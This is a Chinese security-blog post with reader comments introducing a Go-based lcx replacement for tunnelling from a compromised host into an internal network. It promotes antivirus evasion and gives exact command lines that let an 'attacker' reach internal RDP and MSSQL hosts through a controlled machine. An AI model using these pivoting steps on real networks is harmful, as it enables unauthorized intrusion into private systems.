比lcx更好使的内网打洞工具

2015-05-07 50,676

背景介绍

经常有朋友使用lcx,但是由于很多原因可能lcx都不好使,例如下面几点:

1、linux下不支持lcx,这时只能拿msf出来;

2、不免杀;

3、每次内网要重新连接其他主机的时候,都必须重新进去并重新敲打命令 ,并且操作过多时容易被发现。

最近正好上面那些问题都碰上了,于是没办法就使用golang自己写了一个。我写的这个lcx有以下几个特点:

1、golang程序跨平台性,甚至嵌入式Linux都支持;

2、免杀,基本上目前golang程序都不会被识别为病毒;

3、肉鸡只需操作一次,其他的都交给主控端操作。

该工具运行界面如下所示:

lcx1

 

使用方法

为了讲解该工具的功能和使用方法,以下列场景展开介绍:

lcx2

 

前提介绍:

网络拓扑如上图所示,内网私有,外网无法直接访问内网任意主机,但其中A已经控制了B。

实现目标:

攻击者A通过B 连接内网中任意一台计算机(如远程桌面,数据库等)。

场景一:A连接内网中C的远程桌面

第一步: 在B上面输入指令:

lcx 111.13.100.92 123

第二步:假如 A 想连接内网中 C 的远程桌面,那么在A上输入指令:

lcx 456 123 192.168.10.3 3389

这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。

场景二:A连接内网中其他机器的MS SQL数据库(假设IP地址为192.168.10.55)

第一步,在B上输入指令:

lcx 111.13.100.92 123

第二步,在A上输入指令:

lcx 1433 123 192.168.10.55 1433

这时,A只用连接本机1433端口就等于连接内网中(192.168.10.55)的1433端口了。

工具下载

暂时只提供windows版本:lcx._g

【本文由Yatere投稿,安全脉搏PulseO0O整理发布】

本文作者:PulseO0O

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/6341.html

Tags:
评论  (26)
快来写下你的想法吧!
  • s1r1u5 个人认证 2015-05-08 11:05:15

    端口转发吗,现在主要适用meterpreter的portfwd,不过先收了

  • hhyyaa 2015-05-08 18:40:02

    比lcx灵活一些。

  • 蒂娜 2015-06-01 0:53:02

    测试下载30MB文件崩溃

  • wonderkun 2015-06-22 23:55:27

    请教一下,如果我就拿下了一台机器,他却有防火墙,我无法连接他的3389端口,需要把他的3389端口转发出来,应该怎么做?

  • 中原 2015-07-07 10:32:11

    你说这个早就有了,只不过每人发出来。lcx确实不够灵活,但是体积比较小,压缩后在8K。不知道你这个go版本有多大。

  • 黑阔二大爷 2015-09-23 22:46:27

    不错,正需要这样的工具,lcx真TNND蛋疼 每次用它都是登录进去就卡死 无论网速多快的情况下都是如此。msf的portfwd虽然好用 但是在我服务器的kali2虚拟机里转发端口就不好用了 因为虚拟机处于内网 要物理机映射端口 portfwd不能再外网IP直接绑定端口 所以转发不了。搜半天了没找到能用的 试试你这个,先收下了 谢谢了!

  • BaldLei 2015-10-17 18:01:29

    嘿,哥们。 我怎么看不明白呢? 场景1的IP地址是什么呢? 我本机执行lcx._g.exe xx.xx.xx.xx 666,然后肉鸡执行lcx._g.exe 456 666 内网ip 3389,怎么不行呢?

  • BaldLei 2015-10-17 18:11:22

    请问出现exchange over 链接中断咋办?

  • haige 2015-11-24 15:47:12

    好像附件下载不了了?!

  • YAIBA 2015-12-25 21:41:09

    留名

  • 求作者QQ 2016-01-22 3:12:59

    如果A直接想连B 该怎么决解 老实说真不会用

  • G 2016-03-15 19:16:56

    lcx 123 456 192.168.10.3 3389

  • 大大怪 2016-04-06 20:52:52

    如果A直接连接B呢?不会使

  • snoopy 2016-04-11 16:13:30

    我测试了下,转发不起,登录3389报协议错误

  • 33383622 2016-04-11 19:33:39

    测试了2台,没有成功???连接报协议错误!

  • tony 2016-05-10 9:52:42

    这个程序的源码可发布出来供学习下吗? 谢谢

  • 报错了 2016-05-26 0:25:41

    D:\tool>lcx._g.exe 123 192.168.128.18 3389
    123 3389 192.168.128.18
    2016/05/26 00:19:57 portforward listen on 123
    2016/05/26 00:21:23 remote dial failed: dial tcp 192.168.128.18:3389: ConnectEx
    tcp: A connection attempt failed because the connected party did not properly re
    spond after a period of time, or established connection failed because connected
    host has failed to respond.
    panic: runtime error: invalid memory address or nil pointer dereference
    [signal 0xc0000005 code=0x0 addr=0x14 pc=0x401c44]

    goroutine 1 [running]:
    main.main()
    F:/golang/src/lcx/main.go:78 +0xc44

  • 123 2016-05-31 13:10:40

    被360完美查杀

  • hacker 2016-06-10 1:43:53

    请问Linux版本什么时间分享?

  • Alieno 2016-12-18 22:19:18

    A连接B的话,真tm不会用,感觉贼鸡肋

  • 123 2017-01-17 10:17:43

    转发b的3389出来怎么操作呢?我测试报错。错误格式和这个一样,求解
    D:\tool>lcx._g.exe 123 192.168.128.18 3389
    123 3389 192.168.128.18
    2016/05/26 00:19:57 portforward listen on 123
    2016/05/26 00:21:23 remote dial failed: dial tcp 192.168.128.18:3389: ConnectEx
    tcp: A connection attempt failed because the connected party did not properly re
    spond after a period of time, or established connection failed because connected
    host has failed to respond.
    panic: runtime error: invalid memory address or nil pointer dereference
    [signal 0xc0000005 code=0x0 addr=0x14 pc=0x401c44]

    goroutine 1 [running]:
    main.main()
    F:/golang/src/lcx/main.go:78 +0xc44

    • SecPulse 企业认证 2017-01-17 11:40:41

      @123 lcx._g.exe 456 123 192.168.128.18 3389 这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。

  • 95zz 2017-05-06 19:27:49

    linux版本的呢 64位的 有木有

  • 小白 2018-03-06 0:01:00

    A 机为什么还要 设置 内网机的 192.x.x.x IP? ,直接内网机发一个socket到A机不就OK了?
    无意吐槽,用惯了lcx,这个一时半会真不好使。

PulseO0O

文章数:12 积分: 1

搞死“永恒之蓝”。

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号